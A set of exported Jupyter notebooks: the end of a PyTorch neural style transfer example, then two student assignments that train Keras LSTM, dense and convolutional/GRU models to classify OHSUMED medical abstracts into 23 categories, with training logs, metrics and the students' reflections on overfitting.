# Desired depth layers to compute style/content losses
content_layers_default = ['conv_4']
style_layers_default = ['conv_1', 'conv_2', 'conv_3', 'conv_4', 'conv_5']
# Helper for computing content and style losses
def get_style_model_and_losses(cnn, normalization_mean, normalization_std,
style_img, content_img,
content_layers=content_layers_default,
style_layers=style_layers_default):
cnn = copy.deepcopy(cnn)
# normalization module
normalization = Normalization(normalization_mean, normalization_std).to(device)
# just in order to have an iterable access to or list of content/syle
# losses
content_losses = []
style_losses = []
# assuming that cnn is a nn.Sequential, so we make a new nn.Sequential
# to put in modules that are supposed to be activated sequentially
model = Sequential(normalization)
i = 0 # increment every time we see a conv
for layer in cnn.children():
if isinstance(layer, Conv2d):
i += 1
name = 'conv_{}'.format(i)
elif isinstance(layer, ReLU):
name = 'relu_{}'.format(i)
# The in-place version doesn't play very nicely with the ContentLoss
# and StyleLoss we insert below. So we replace with out-of-place
# ones here.
layer = ReLU(inplace=False)
elif isinstance(layer, MaxPool2d):
name = 'pool_{}'.format(i)
elif isinstance(layer, BatchNorm2d):
name = 'bn_{}'.format(i)
else:
raise RuntimeError('Unrecognized layer: {}'.format(layer.__class__.__name__))
model.add_module(name, layer)
if name in content_layers:
# add content loss:
target = model(content_img).detach()
content_loss = ContentLoss(target)
model.add_module("content_loss_{}".format(i), content_loss)
content_losses.append(content_loss)
if name in style_layers:
# add style loss:
target_feature = model(style_img).detach()
style_loss = StyleLoss(target_feature)
model.add_module("style_loss_{}".format(i), style_loss)
style_losses.append(style_loss)
# now we trim off the layers after the last content and style losses
for i in range(len(model) - 1, -1, -1):
if isinstance(model[i], ContentLoss) or isinstance(model[i], StyleLoss):
break
model = model[:(i + 1)]
return model, style_losses, content_losses
###Output
_____no_output_____
###Markdown
Performing Backward Propagation
###Code
# Copy content image
input_img = content_img.clone()
# Helper for initializing the L-BFGS optimizer
def get_input_optimizer(input_img):
# this line to show that input is a parameter that requires a gradient
optimizer = LBFGS([input_img.requires_grad_()])
return optimizer
# Perform backward propagation using test content and style images
def run_style_transfer(cnn, normalization_mean, normalization_std,
content_img, style_img, input_img, num_steps=300,
style_weight=1000000, content_weight=1):
"""Run the style transfer."""
print('Building the style transfer model..')
model, style_losses, content_losses = get_style_model_and_losses(cnn,
normalization_mean, normalization_std, style_img, content_img)
optimizer = get_input_optimizer(input_img)
print('Optimizing..')
run = [0]
while run[0] <= num_steps:
def closure():
# correct the values of updated input image
input_img.data.clamp_(0, 1)
optimizer.zero_grad()
model(input_img)
style_score = 0
content_score = 0
for sl in style_losses:
style_score += sl.loss
for cl in content_losses:
content_score += cl.loss
style_score *= style_weight
content_score *= content_weight
loss = style_score + content_score
loss.backward()
run[0] += 1
if run[0] % 50 == 0:
print("run {}:".format(run))
print('Style Loss : {:4f} Content Loss: {:4f}'.format(
style_score.item(), content_score.item()))
print()
return style_score + content_score
optimizer.step(closure)
# a last correction...
input_img.data.clamp_(0, 1)
return input_img
###Output
_____no_output_____
###Markdown
Testing Content and Style Images
###Code
# Generate stylized content image
output = run_style_transfer(
cnn,
cnn_normalization_mean,
cnn_normalization_std,
content_img,
style_img,
input_img
)
# Show generated image
plt.figure()
imshow(output, title='Output Image')
plt.ioff()
plt.show()
# Save generated image
save_image(output, "genimage.png")
###Output
_____no_output_____ |
Case 3. Medical text categorization.ipynb | ###Markdown
Case 3. Medical text categorizationCognitive Systems for Health Technology ApplicationsViljami Koho10.3.2018[Helsinki Metropolia University of Applied Sciences](http:/www.metropolia.fi/en) 1. Objectives The aim of this assignment is to learn to use recurrent and 1D convolutional neural networks to categorize medical texts. 2. Processing raw dataBased on listing 6.8 (p. 189) Chollet: Deep Learning with Python, 2018.
###Code
import os
import time
ohsumed_dir = 'ohsumed-first-20000-docs/'
train_dir = os.path.join(ohsumed_dir, 'training')
# Creates two lists
labels = []
texts = []
# Generate a list L = ['C01', 'C02, ..., 'C023']
L = ['C{:02}'.format(n) for n in range(1, 23 + 1)]
for label_type in L:
dir_name = os.path.join(train_dir, label_type)
for fname in os.listdir(dir_name):
f = open(os.path.join(dir_name, fname))
texts.append(f.read())
f.close()
i = L.index(label_type)
labels.append(i)
###Output
_____no_output_____
###Markdown
3. Tokenize the text of the raw dataBased on listing 6.9 (p. 189) -Preprocess word data into integer tensors-Each sample is zero-padded to lenght "maxlen"-Only "max_words" most frequent words are taken into account
###Code
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
import numpy as np
#Cuts off reviews after 300 words
maxlen = 300
#Considers only the top 20000 words in the dataset
max_words = 20000
tokenizer = Tokenizer(num_words = max_words)
# Forms the words to integer lists
tokenizer.fit_on_texts(texts)
sequences = tokenizer.texts_to_sequences(texts)
word_index = tokenizer.word_index
print('Found %s unique tokens' % len(word_index))
###Output
Using TensorFlow backend.
###Markdown
4. Shape the data and labels
###Code
from keras.utils.np_utils import to_categorical
data = pad_sequences(sequences, maxlen = maxlen)
labels = np.asarray(labels)
one_hot_labels = to_categorical(labels)
print('Shape of data tensor:', data.shape)
print('Shape of labels tensor:', one_hot_labels.shape)
###Output
Shape of data tensor: (10433, 300)
Shape of labels tensor: (10433, 23)
###Markdown
Shuffle the data and labels -Shuffle the training data-Splits the data into a training set and a validation set, but first shuffles the data-Shuffle is important when the data samples are ordered, for example all negative first, then all positive
###Code
indices = np.arange(data.shape[0])
np.random.shuffle(indices)
data = data[indices]
labels = labels[indices]
one_hot_labels = one_hot_labels[indices]
###Output
_____no_output_____
###Markdown
5. Build the modelListing 6.7 (p. 187)
###Code
# Build and compile the network model
from keras.models import Sequential
from keras.layers import Flatten, Dense, Embedding, Dropout, LSTM
model = Sequential()
model.add(Embedding(max_words, 32, input_shape=(maxlen,)))
model.add(LSTM(100, dropout=0.2))
model.add(Dense(23, activation = 'softmax'))
model.compile(optimizer = 'rmsprop',
loss = 'categorical_crossentropy',
metrics = ['accuracy'])
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_1 (Embedding) (None, 300, 32) 640000
_________________________________________________________________
lstm_1 (LSTM) (None, 100) 53200
_________________________________________________________________
dense_1 (Dense) (None, 23) 2323
=================================================================
Total params: 695,523
Trainable params: 695,523
Non-trainable params: 0
_________________________________________________________________
###Markdown
6. Train the model
###Code
import time
t1 = time.time()
# Fit the model to training data
history = model.fit(data, one_hot_labels,
epochs = 20,
batch_size = 32,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
###Output
Train on 8346 samples, validate on 2087 samples
Epoch 1/20
8346/8346 [==============================] - 81s 10ms/step - loss: 2.8183 - acc: 0.1695 - val_loss: 2.8146 - val_acc: 0.1634
Epoch 2/20
8346/8346 [==============================] - 80s 10ms/step - loss: 2.7158 - acc: 0.1885 - val_loss: 2.6743 - val_acc: 0.2089
Epoch 3/20
8346/8346 [==============================] - 78s 9ms/step - loss: 2.5646 - acc: 0.2351 - val_loss: 2.6487 - val_acc: 0.2262
Epoch 4/20
8346/8346 [==============================] - 77s 9ms/step - loss: 2.4380 - acc: 0.2731 - val_loss: 2.6455 - val_acc: 0.2103
Epoch 5/20
8346/8346 [==============================] - 78s 9ms/step - loss: 2.3384 - acc: 0.2922 - val_loss: 2.6132 - val_acc: 0.2295
Epoch 6/20
8346/8346 [==============================] - 78s 9ms/step - loss: 2.2272 - acc: 0.3217 - val_loss: 2.6132 - val_acc: 0.2171
Epoch 7/20
8346/8346 [==============================] - 78s 9ms/step - loss: 2.1232 - acc: 0.3466 - val_loss: 2.6154 - val_acc: 0.2314
Epoch 8/20
8346/8346 [==============================] - 78s 9ms/step - loss: 2.0232 - acc: 0.3802 - val_loss: 2.7473 - val_acc: 0.2238
Epoch 9/20
8346/8346 [==============================] - 78s 9ms/step - loss: 1.9434 - acc: 0.3991 - val_loss: 2.7813 - val_acc: 0.1969
Epoch 10/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.8530 - acc: 0.4329 - val_loss: 2.7615 - val_acc: 0.2223
Epoch 11/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.7759 - acc: 0.4499 - val_loss: 2.7539 - val_acc: 0.2161
Epoch 12/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.7133 - acc: 0.4612 - val_loss: 2.8359 - val_acc: 0.2012
Epoch 13/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.6416 - acc: 0.4883 - val_loss: 2.8841 - val_acc: 0.2041
Epoch 14/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.5847 - acc: 0.4935 - val_loss: 2.9283 - val_acc: 0.2084
Epoch 15/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.5405 - acc: 0.5150 - val_loss: 2.9914 - val_acc: 0.1989
Epoch 16/20
8346/8346 [==============================] - 78s 9ms/step - loss: 1.4959 - acc: 0.5208 - val_loss: 3.0528 - val_acc: 0.1974
Epoch 17/20
8346/8346 [==============================] - 77s 9ms/step - loss: 1.4438 - acc: 0.5266 - val_loss: 3.0787 - val_acc: 0.1955
Epoch 18/20
8346/8346 [==============================] - 78s 9ms/step - loss: 1.4076 - acc: 0.5409 - val_loss: 3.1773 - val_acc: 0.1931
Epoch 19/20
8346/8346 [==============================] - 78s 9ms/step - loss: 1.3692 - acc: 0.5462 - val_loss: 3.2882 - val_acc: 0.1720
Epoch 20/20
8346/8346 [==============================] - 81s 10ms/step - loss: 1.3318 - acc: 0.5518 - val_loss: 3.2833 - val_acc: 0.1682
Elapsed time: 1561.79 seconds
###Markdown
7. Training results
###Code
# Plot the results
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(acc) + 1)
plt.figure(figsize=(15, 3))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.grid()
plt.xlabel('Epoch')
plt.legend()
plt.figure(figsize=(15, 3))
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.grid()
plt.xlabel('Epoch')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
- My first test epochs = 10, batch_size = 32, validation_split = 0.2) model.add(Embedding(max_words, 32, input_length=maxlen)) model.add(Flatten()) - At first I got the network acc near ~57 %, but I wasn't happy with the validation acc, because it was only 0,08 = ~8% which is bad... - After that I tried other parameters to get better results...- It didn't work distinctly----------------------------------------------------------------------------------------------------------------------------- On my second test I tried some other parameters listed below... epochs = 20, batch_size = 64, validation_split = 0.2) model.add(Embedding(max_words, 32, input_length=maxlen)) model.add(Flatten()) - On my second test the acc was almost the same (~60%) and validation acc was a little bit higher than test 1 (0,125 = 12,5%)- Still I wasn't happy with the validation acc, I needed to get that higher...------------------------------------------------------------------------------------------------------------------------------ After my second test I decided to add dropout layer and see what happens--> model.add(Dropout(0.3)) - The result was still "horrible" arghh- Then I tried to add other dropout layer, because I was still thinking that the network was over fitting and thatswhy the validation accuracy results were decreasing... -model.add(Dense(1024, activation = 'relu')) -model.add(Dropout(0.3)) -model.add(Dense(256, activation = 'relu')) -model.add(Dropout(0.2)) -model.add(Dense(len(L), activation = 'softmax')) -history = model.fit(data, one_hot_labels, epochs = 20, batch_size = 32, validation_split = 0.2) - No effort! Validation acc was still bad and not even close to the acc values...------------------------------------------------------------------------------------------------------------------------------- I made still some changes... I decided to change maxlen and max_words values- Cuts off reviews after 250 words maxlen = 250 --> maxleng from 250 to 300- Considers only the top 10000 words in the dataset max_words = 10000 --> max_words from 10000 to 20000 --> Not significant change in the outcome------------------------------------------------------------------------------------------------------------------------------- In my final test I tried to use LSTM layer to get better results and it seemed to work better than the one I used Dense layers only.- Now I can get better results than earlier --> acc: ~56% and val acc: ~18%- There seems to be still some over fitting --> the val acc is decreasing slowly- I tried to Google the problem and I found that:"In general a model that over fits can be improved by adding more dropout, or training and validating on a larger data set."- So I tried to add more dropout again. Metrics results
###Code
# Calculate the predictions
predictions = model.predict(data)
y_pred = np.argmax(predictions, axis = 1)
predictions[0]
# http://scikit-learn.org/stable/modules/model_evaluation.html
from sklearn.metrics import accuracy_score, precision_score, f1_score, confusion_matrix
from sklearn.metrics import classification_report, recall_score
# Classification results per class
print(classification_report(labels, y_pred))
# Confusion matrix
cm = confusion_matrix(labels, y_pred)
print(np.array2string(cm, max_line_width = 100))
print(texts[indices[512]])
print('True class: ', labels[512])
print('Predicted class:', y_pred[512])
print('Predictions per class:')
print(np.array2string(predictions[512], precision = 2))
plt.stem(predictions[512])
plt.show()
np.__version__
#Download and preprocess test data
test_dir = os.path.join(ohsumed_dir, 'test')
test_labels = []
test_texts = []
for label_type in L:
dir_name = os.path.join(test_dir, label_type)
for fname in os.listdir(dir_name):
f = open(os.path.join(dir_name, fname))
test_texts.append(f.read())
f.close()
test_labels.append(L.index(label_type))
test_sequences = tokenizer.texts_to_sequences(test_texts)
x_test = pad_sequences(test_sequences, maxlen=maxlen)
test_labels = np.asarray(test_labels)
y_test = to_categorical(test_labels)
#Evaluate model with test data
model.evaluate(x_test, y_test)
###Output
12733/12733 [==============================] - 28s 2ms/step
###Markdown
Case 3. Medical text categorizationThi, Le Thanh - 1504521 Cognitive Systems for Health Technology Applications Helsinki Metropolia University of Applied Sciences TaskTo use recurrent and convolutional neural networks to create a classifier for a collection of medical abstracts extracted from MEDLINE. Download and Preprocessing Datahttp://disi.unitn.it/moschitti/corpora.htm. Download than pre-computed embedding from the link. Cardiovascular diseases abstracts, file name 'ohsumed-first-20000-docs.tar.gz'
###Code
from urllib.request import urlretrieve
url = r"http://disi.unitn.it/moschitti/corpora/ohsumed-first-20000-docs.tar.gz"
dst = 'ohsumed-first-20000-docs.tar.gz'
urlretrieve(url, dst)
# Extract the tarfile. Creates a folder: ohsu-trec
import tarfile
tar = tarfile.open("ohsumed-first-20000-docs.tar.gz")
tar.extractall()
tar.close()
###Output
_____no_output_____
###Markdown
Collect the individual training review into a list of strings, on string per review and let's also collect the review labels into a lables list. So we have 23 Categories
###Code
import os
ohsumed_dir = r'C:\Users\Thi\Desktop\ohsumed-first-20000-docs'
train_dir = os.path.join(ohsumed_dir, 'training')
labels = []
texts = []
# Generate a list L = ['C01', 'C02, ..., 'C023']
L = ['C{:02}'.format(n) for n in range(1, 23 + 1)]
for label_type in L:
dir_name = os.path.join(train_dir, label_type)
for fname in os.listdir(dir_name):
f = open(os.path.join(dir_name, fname))
texts.append(f.read())
f.close()
i = L.index(label_type)
labels.append(i)
###Output
_____no_output_____
###Markdown
Tokenize the text of the raw dataVectorize the texts have been collected. We will review after 500 words and only consider the top 20,000 words in the dataset.
###Code
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
import numpy as np
maxlen = 500
max_words = 20000
tokenizer = Tokenizer(num_words = max_words)
tokenizer.fit_on_texts(texts)
sequences = tokenizer.texts_to_sequences(texts)
word_index = tokenizer.word_index
print('Found %s unique tokens' % len(word_index))
#Shape the data and labels
from keras.utils.np_utils import to_categorical
data = pad_sequences(sequences, maxlen = maxlen)
labels = np.asarray(labels)
one_hot_labels = to_categorical(labels)
print('Shape of data tensor:', data.shape)
print('Shape of labels tensor:', one_hot_labels.shape)
#Shuffle the data and labels
indices = np.arange(data.shape[0])
np.random.shuffle(indices)
data = data[indices]
labels = labels[indices]
one_hot_labels = one_hot_labels[indices]
###Output
_____no_output_____
###Markdown
Build the modelMake a simple network with random layer and number of neurals.
###Code
from keras.models import Sequential
from keras.layers import Flatten, Dense, Embedding
model = Sequential()
model.add(Embedding(max_words, 8, input_length=maxlen))
model.add(Flatten())
model.add(Dense(1024, activation = 'relu'))
model.add(Dense(256, activation = 'relu'))
model.add(Dense(len(L), activation = 'softmax'))
model.compile(optimizer = 'rmsprop',
loss = 'categorical_crossentropy',
metrics = ['accuracy'])
model.summary()
# Train the model
import time
t1 = time.time()
history = model.fit(data, one_hot_labels,
epochs = 10,
batch_size = 32,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
# Training results
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(acc) + 1)
plt.figure(figsize=(15, 3))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.grid()
plt.xlabel('Epoch')
plt.legend()
plt.figure(figsize=(15, 3))
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.grid()
plt.xlabel('Epoch')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
Metrics resultsBut looking the result above the highest accuracy we can get iss 25% at the second epoch. But to the classification, accuracy alone is a bad measure for the model.
###Code
# Calculate the predictions
predictions = model.predict(data)
y_pred = np.argmax(predictions, axis = 1)
# http://scikit-learn.org/stable/modules/model_evaluation.html
from sklearn.metrics import accuracy_score, precision_score, f1_score, confusion_matrix
from sklearn.metrics import classification_report, recall_score
# Confusion matrix
cm = confusion_matrix(labels, y_pred)
print(np.array2string(cm, max_line_width = 100))
###Output
[[241 10 1 13 7 15 4 18 2 3 8 4 13 15 1 5 8 0 0 16 9 2 28]
[ 11 61 0 15 0 6 2 6 4 3 3 2 5 5 1 1 2 0 1 24 0 0 6]
[ 3 1 35 2 0 2 0 3 0 2 2 1 0 2 0 1 0 2 0 3 0 1 5]
[ 10 4 1 886 8 15 20 41 17 7 11 23 14 6 3 5 12 2 21 7 3 0 47]
[ 12 0 0 12 165 3 1 3 0 4 2 2 2 4 2 7 7 5 2 7 17 0 26]
[ 26 5 3 77 4 286 0 9 0 3 1 7 6 26 2 4 8 8 8 6 6 7 86]
[ 2 1 0 10 3 1 72 1 2 0 0 1 0 2 0 0 1 2 0 0 0 0 2]
[ 23 6 3 43 3 6 2 249 12 1 1 1 2 31 1 8 2 4 2 20 18 4 31]
[ 0 0 0 13 2 0 0 7 80 3 2 1 1 1 0 0 1 1 0 2 1 0 10]
[ 11 3 2 45 24 7 4 4 2 239 16 4 8 51 0 7 6 6 8 13 32 4 125]
[ 1 1 2 7 4 1 1 0 0 0 108 2 0 3 0 3 4 3 0 6 2 0 14]
[ 15 0 0 94 1 8 0 11 1 5 0 228 9 33 2 6 4 9 12 4 2 2 45]
[ 9 5 1 37 0 5 0 6 0 1 0 4 167 4 1 2 6 1 2 11 0 0 19]
[ 18 1 1 26 4 4 2 12 0 14 7 15 18 954 3 22 13 19 8 3 14 3 88]
[ 10 2 1 27 7 4 2 13 1 1 3 15 9 13 64 2 7 3 2 11 3 1 14]
[ 3 0 0 12 4 1 1 3 2 3 0 1 9 19 0 125 1 1 1 3 1 0 10]
[ 4 2 0 28 20 1 7 3 4 4 6 5 3 4 0 4 162 0 3 14 2 2 17]
[ 3 1 0 18 5 7 2 2 0 2 4 11 2 38 0 1 2 224 23 2 5 1 35]
[ 0 0 0 19 6 1 0 1 0 2 3 1 0 20 0 1 2 20 101 4 1 0 9]
[ 20 17 2 54 6 12 4 30 6 8 5 11 8 11 2 1 12 3 5 280 11 1 16]
[ 17 0 1 19 22 18 2 5 2 3 8 6 2 25 2 0 12 5 1 12 328 7 49]
[ 6 1 0 2 3 5 0 2 0 1 0 0 0 21 0 0 4 3 1 1 2 37 3]
[ 53 12 6 193 49 90 13 62 24 20 23 37 33 284 11 39 32 14 15 33 48 8 700]]
###Markdown
Reading confusion matrixWe have 23 class, so our matrix 23x23. For example, in class/label 0, text belong to file C01, out of 498 prediction only 241 are correct. This ratio is precision, we can see it in below table. Another ratio is recall, 57% in class 0. It means in 423 text or data belong to class 0. The model only picks up 241. Combie both ratio we have f1-score to measure our model. The average score is 55%
###Code
# Classification results per class
print(classification_report(labels, y_pred))
###Output
precision recall f1-score support
0 0.48 0.57 0.52 423
1 0.46 0.39 0.42 158
2 0.59 0.54 0.56 65
3 0.54 0.76 0.63 1163
4 0.48 0.58 0.52 283
5 0.57 0.49 0.53 588
6 0.52 0.72 0.60 100
7 0.51 0.53 0.52 473
8 0.50 0.64 0.56 125
9 0.73 0.38 0.50 621
10 0.51 0.67 0.58 162
11 0.60 0.46 0.52 491
12 0.54 0.59 0.56 281
13 0.61 0.76 0.68 1249
14 0.67 0.30 0.41 215
15 0.51 0.62 0.56 200
16 0.53 0.55 0.54 295
17 0.67 0.58 0.62 388
18 0.47 0.53 0.50 191
19 0.58 0.53 0.56 525
20 0.65 0.60 0.62 546
21 0.46 0.40 0.43 92
22 0.51 0.39 0.44 1799
avg / total 0.56 0.56 0.55 10433
###Markdown
Try to improve performanceBy add more tool, changing the capacity of network to get a better result
###Code
# Require Libraries
from keras.layers import LSTM, Dropout, Conv1D, MaxPooling1D, GlobalMaxPooling1D, GRU
model = Sequential()
model.add(Embedding(max_words, 32, input_length=maxlen))
model.add(Conv1D(32, 9, activation='relu'))
model.add(MaxPooling1D(5))
model.add(Conv1D(32, 9, activation='relu'))
model.add(GRU(32, dropout=0.1, recurrent_dropout=0.5))
model.add(Dense(1024, activation = 'relu'))
model.add(Dense(len(L), activation = 'softmax'))
model.compile(optimizer = 'rmsprop',
loss = 'categorical_crossentropy',
metrics = ['accuracy'])
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_2 (Embedding) (None, 500, 32) 640000
_________________________________________________________________
conv1d_1 (Conv1D) (None, 492, 32) 9248
_________________________________________________________________
max_pooling1d_1 (MaxPooling1 (None, 98, 32) 0
_________________________________________________________________
conv1d_2 (Conv1D) (None, 90, 32) 9248
_________________________________________________________________
gru_1 (GRU) (None, 32) 6240
_________________________________________________________________
dense_4 (Dense) (None, 1024) 33792
_________________________________________________________________
dense_5 (Dense) (None, 23) 23575
=================================================================
Total params: 722,103
Trainable params: 722,103
Non-trainable params: 0
_________________________________________________________________
###Markdown
I add a convnet layer after embedding word, increase dimension and use the rule of thumbs. The rule is if N is output. The number of neural in hidden layer will in ration of ...3xN 2xN 1.5xN NGRU in place of Flatten, LSTM or GlobalMaxPooling. The result: parameter is reduce from 4,5 million to around 7 hundred thousand. The validation accuracy is poorly
###Code
import time
t1 = time.time()
history = model.fit(data, one_hot_labels,
epochs = 12,
batch_size = 32,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
###Output
Train on 8346 samples, validate on 2087 samples
Epoch 1/12
8346/8346 [==============================] - 62s 7ms/step - loss: 2.8802 - acc: 0.1517 - val_loss: 2.8993 - val_acc: 0.1260
Epoch 2/12
8346/8346 [==============================] - 61s 7ms/step - loss: 2.8328 - acc: 0.1511 - val_loss: 2.9058 - val_acc: 0.1188
Epoch 3/12
8346/8346 [==============================] - 66s 8ms/step - loss: 2.7751 - acc: 0.1745 - val_loss: 2.8755 - val_acc: 0.1893
Epoch 4/12
8346/8346 [==============================] - 62s 7ms/step - loss: 2.7961 - acc: 0.1742 - val_loss: 2.9464 - val_acc: 0.1514
Epoch 5/12
8346/8346 [==============================] - 60s 7ms/step - loss: 2.8355 - acc: 0.1842 - val_loss: 2.9466 - val_acc: 0.1998
Epoch 6/12
8346/8346 [==============================] - 64s 8ms/step - loss: 2.8873 - acc: 0.1964 - val_loss: 3.5905 - val_acc: 0.1893
Epoch 7/12
8346/8346 [==============================] - 62s 7ms/step - loss: 2.9915 - acc: 0.1825 - val_loss: 3.5039 - val_acc: 0.1030
Epoch 8/12
8346/8346 [==============================] - 56s 7ms/step - loss: 3.1240 - acc: 0.1783 - val_loss: 3.4315 - val_acc: 0.1926
Epoch 9/12
8346/8346 [==============================] - 58s 7ms/step - loss: 3.2366 - acc: 0.1746 - val_loss: 3.8641 - val_acc: 0.1327
Epoch 10/12
8346/8346 [==============================] - 60s 7ms/step - loss: 3.3589 - acc: 0.1782 - val_loss: 3.9219 - val_acc: 0.1581
Epoch 11/12
8346/8346 [==============================] - 58s 7ms/step - loss: 3.5194 - acc: 0.1816 - val_loss: 5.9114 - val_acc: 0.0379
Epoch 12/12
8346/8346 [==============================] - 55s 7ms/step - loss: 3.5893 - acc: 0.1879 - val_loss: 4.4951 - val_acc: 0.1169
Elapsed time: 728.18 seconds
###Markdown
Compare to the first model. It does better in the later epochs so I thought perhap if I introduce to resisting overfitting tools, it could do better.
###Code
from keras import regularizers
model = Sequential()
model.add(Embedding(max_words, 46, input_length=maxlen))
model.add(Flatten())
model.add(Dense(690,kernel_regularizer=regularizers.l2(0.009), activation = 'relu'))
model.add(Dropout(0.2))
model.add(Dense(460,kernel_regularizer=regularizers.l2(0.009), activation = 'relu'))
model.add(Dropout(0.4))
model.add(Dense(230,kernel_regularizer=regularizers.l2(0.009), activation = 'relu'))
model.add(Dropout(0.5))
model.add(Dense(len(L), activation = 'softmax'))
model.compile(optimizer = 'rmsprop',
loss = 'categorical_crossentropy',
metrics = ['accuracy'])
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_31 (Embedding) (None, 500, 46) 920000
_________________________________________________________________
flatten_20 (Flatten) (None, 23000) 0
_________________________________________________________________
dense_97 (Dense) (None, 690) 15870690
_________________________________________________________________
dropout_65 (Dropout) (None, 690) 0
_________________________________________________________________
dense_98 (Dense) (None, 460) 317860
_________________________________________________________________
dropout_66 (Dropout) (None, 460) 0
_________________________________________________________________
dense_99 (Dense) (None, 230) 106030
_________________________________________________________________
dropout_67 (Dropout) (None, 230) 0
_________________________________________________________________
dense_100 (Dense) (None, 23) 5313
=================================================================
Total params: 17,219,893
Trainable params: 17,219,893
Non-trainable params: 0
_________________________________________________________________
###Markdown
The capacity of the model have been increase and also I add two way to reduce overfitting, droptou and regulazier. The result: The losses have been increase but the accuracies still nearly the same even after 30 epochs, but it does resist the overfitting.
###Code
t1 = time.time()
history = model.fit(data, one_hot_labels,
epochs = 30,
batch_size = 128,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
model = Sequential()
model.add(Embedding(max_words, 32, input_length=maxlen))
model.add(Conv1D(32, 9, activation='relu'))
model.add(MaxPooling1D(5))
model.add(Conv1D(32, 9, activation='relu'))
model.add(GRU(32, dropout=0.1, recurrent_dropout=0.5))
model.add(Dense(1024, activation = 'relu'))
model.add(Dense(len(L), activation = 'softmax'))
model.compile(loss='binary_crossentropy',
optimizer='adamax',
metrics= ['accuracy'])
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_34 (Embedding) (None, 500, 32) 640000
_________________________________________________________________
conv1d_28 (Conv1D) (None, 492, 32) 9248
_________________________________________________________________
max_pooling1d_19 (MaxPooling (None, 98, 32) 0
_________________________________________________________________
conv1d_29 (Conv1D) (None, 90, 32) 9248
_________________________________________________________________
gru_5 (GRU) (None, 32) 6240
_________________________________________________________________
dense_105 (Dense) (None, 1024) 33792
_________________________________________________________________
dense_106 (Dense) (None, 23) 23575
=================================================================
Total params: 722,103
Trainable params: 722,103
Non-trainable params: 0
_________________________________________________________________
###Markdown
The best performance in train and validate but this's just a nonsense model, created after many anttempt to improve the model
###Code
t1 = time.time()
history = model.fit(data, one_hot_labels,
epochs = 10,
batch_size = 128,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
from keras.metrics import categorical_accuracy
model = Sequential()
model.add(Embedding(max_words, 32, input_length=maxlen))
model.add(Conv1D(32, 9, activation='relu'))
model.add(MaxPooling1D(5))
model.add(Conv1D(32, 9, activation='relu'))
model.add(GRU(32, dropout=0.1, recurrent_dropout=0.5))
model.add(Dense(1024, activation = 'relu'))
model.add(Dense(len(L), activation = 'softmax'))
model.compile(optimizer = 'rmsprop',
loss = 'categorical_crossentropy',
metrics = [categorical_accuracy])
model.summary()
###Output
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
embedding_36 (Embedding) (None, 500, 32) 640000
_________________________________________________________________
conv1d_32 (Conv1D) (None, 492, 32) 9248
_________________________________________________________________
max_pooling1d_21 (MaxPooling (None, 98, 32) 0
_________________________________________________________________
conv1d_33 (Conv1D) (None, 90, 32) 9248
_________________________________________________________________
gru_7 (GRU) (None, 32) 6240
_________________________________________________________________
dense_109 (Dense) (None, 1024) 33792
_________________________________________________________________
dense_110 (Dense) (None, 23) 23575
=================================================================
Total params: 722,103
Trainable params: 722,103
Non-trainable params: 0
_________________________________________________________________
###Markdown
Last try and still fail
###Code
t1 = time.time()
history = model.fit(data, one_hot_labels,
epochs = 10,
batch_size = 128,
validation_split = 0.2)
t2 = time.time()
print('Elapsed time: {:.2f} seconds'.format((t2-t1)))
###Output
Train on 8346 samples, validate on 2087 samples
Epoch 1/10
8346/8346 [==============================] - 30s 4ms/step - loss: 2.8232 - categorical_accuracy: 0.1674 - val_loss: 2.7949 - val_categorical_accuracy: 0.1730
Epoch 2/10
8346/8346 [==============================] - 25s 3ms/step - loss: 2.7035 - categorical_accuracy: 0.1751 - val_loss: 2.6963 - val_categorical_accuracy: 0.2065
Epoch 3/10
8346/8346 [==============================] - 26s 3ms/step - loss: 2.5764 - categorical_accuracy: 0.2025 - val_loss: 2.8164 - val_categorical_accuracy: 0.2113
Epoch 4/10
8346/8346 [==============================] - 26s 3ms/step - loss: 2.5005 - categorical_accuracy: 0.2213 - val_loss: 2.7194 - val_categorical_accuracy: 0.2084
Epoch 5/10
8346/8346 [==============================] - 26s 3ms/step - loss: 2.4247 - categorical_accuracy: 0.2505 - val_loss: 2.7581 - val_categorical_accuracy: 0.2276
Epoch 6/10
